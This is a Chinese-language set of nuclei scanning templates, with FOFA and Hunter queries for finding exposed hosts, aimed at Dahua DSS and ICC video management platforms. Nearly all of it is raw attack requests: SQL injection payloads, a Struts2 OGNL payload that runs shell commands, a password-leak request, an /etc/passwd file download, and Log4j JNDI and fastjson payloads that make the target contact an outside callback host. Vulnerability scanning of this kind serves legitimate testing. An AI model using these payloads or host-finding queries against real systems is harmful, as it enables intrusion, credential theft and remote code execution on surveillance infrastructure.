大华
大华DSS数字监控系统attachment_clearTempFile.action SQL注入
FOFA:app="dahua-DSS"
hunter:app.name=="Dahua 大华 DSS 视频管理系统"
nuclei
id: dahua-sql-attachment
info:
name: dahua-sql-attachment
author: BY
severity: high
tags: dahua
description: 大华DSS数字监控系统attachment_clearTempFile.action SQL注入
http:
- raw:
- |
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,(select%2012345678),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
matchers:
- type: dsl
dsl:
- status_code == 200 && contains(body,'~12345678')
大华DSS数字监控系统deleteBulletin-SQL注入漏洞
FOFA:app="dahua-DSS"
hunter:app.name=="Dahua 大华 DSS 视频管理系统"
nuclei
id: dahua-sql-deleteBulletin
info:
name: dahua-sql-deleteBulletin
author: BY
severity: high
tags: dahua
description: 大华DSS数字监控系统deleteBulletin-SQL注入漏洞
requests:
- raw:
- |+
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,(SELECT 12345678),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>
matchers:
- type: dsl
dsl:
- 'status_code==500 && contains(body,"error code [1105]") && contains(body,"~12345678")'
大华DSS数字监控系统存在strust2命令执行漏洞
FOFA:body="/portal/include/script/dahuaDefined/headCommon.js?type=index"&&title="DSS"
nuclei
id: dahua-rce-strust2
info:
name: dahua-rce-strust2
author: BY
severity: high
tags: dahua
description: 大华DSS数字监控系统存在strust2命令执行漏洞
requests:
- raw:
- |+
GET /admin/login_login.action HTTP/1.1
Host: {{Hostname}}
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains(body,"bin")'
大华DSS数字监控系统user_edit存在密码泄漏漏洞
FOFA:body="/portal/include/script/dahuaDefined/headCommon.js?type=index"&&title="DSS"
nuclei
id: dahua-info-user_edit
info:
name: dahua-info-user_edit
author: BY
severity: high
tags: dahua
description: 大华DSS数字监控系统user_edit存在密码泄漏漏洞
requests:
- raw:
- |+
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=1B1D0EBCE3AC082FDBA00062678EAAC9; JSESSIONID=48C3365B18E192DAAB020C90A2BF0DEF
Upgrade-Insecure-Requests: 1
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains(body,"password") && contains(body,"loginPass")'
大华DDS数字监控系统attachment_downloadByUrlAtt.action-任意文件下载漏洞
FOFA:app="dahua-DSS"
hunter:app.name=="Dahua 大华 DSS 视频管理系统"
nuclei
id: dahua-download-ByUrlAtt
info:
name: dahua-download-ByUrlAtt
author: BY
severity: high
tags: dahua
description: 大华DDS数字监控系统attachment_downloadByUrlAtt.action-任意文件下载漏洞
requests:
- raw:
- |+
GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains(body,"root:")'
大华智能物联综合管理平台(ICC)is-exist存在log4j远程代码执行漏洞
FOFA:body="*客户端会小于800*"
hunter:web.body="*客户端会小于800*"
两种请求头,分别为200/406响应
测试中没有发现能直接利用的资产,jdk版本都大于191
nuclei
id: dahua-log4j-is-exist
info:
name: dahua-log4j-is-exist
author: BY
severity: high
description: 大华智能物联综合管理平台(ICC)is-exist存在log4j远程代码执行漏洞
requests:
- raw:
- |
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/2
Host: {{Hostname}}
Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Accept-Language: zh-CN
Timeoffset: -28800000
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8
cmd: whoami
Accept: application/json, text/plain, */*
User-Client: 1
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Content-Length: 49
{"loginName":"${jndi:ldap://${sys:java.version}.{{interactsh-url}}}"}
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "1.8.0_1"
nuclei2
id: dahua-log4j-is-exist
info:
name: dahua-log4j-is-exist
author: BY
severity: high
description: 大华智能物联综合管理平台(ICC)is-exist存在log4j远程代码执行漏洞
requests:
- raw:
- |
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/2
Host: {{Hostname}}
Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Accept-Language: zh-CN
Timeoffset: -28800000
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8
cmd: whoami
Accept: application/json, text/plain, */*
User-Client: 1
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Content-Length: 49
{"loginName":"${jndi:ldap://${sys:java.version}.{{interactsh-url}}}"}
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
大华智能物联综合管理平台(ICC)random存在fastjson远程命令执行
FOFA:body="*客户端会小于800*",icon_hash="-1935899595"
hunter:web.body="*客户端会小于800*"
nuclei
id: dahua-rce-fastjson
info:
name: dahua-rce-fastjson
author: BY
severity: high
description: 大华智能物联综合管理平台(ICC)random存在fastjson远程命令执行
requests:
- raw:
- |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0)
Connection: close
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip, deflate
{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}}""},"b":{{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}:"x"},"c":{{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}:0,"d":Set[{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}],"e":Set[{"@type":"java.net.URL","val":"http://{{interactsh-url}}"},}
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
id: dahua-rce-fastjson
info:
name: dahua-rce-fastjson
author: BY
severity: high
description: 大华智能物联综合管理平台(ICC)random存在fastjson远程命令执行
requests:
- raw:
- |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0)
Connection: close
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip, deflate
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true},"hfe4zyyzldp":"="}
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"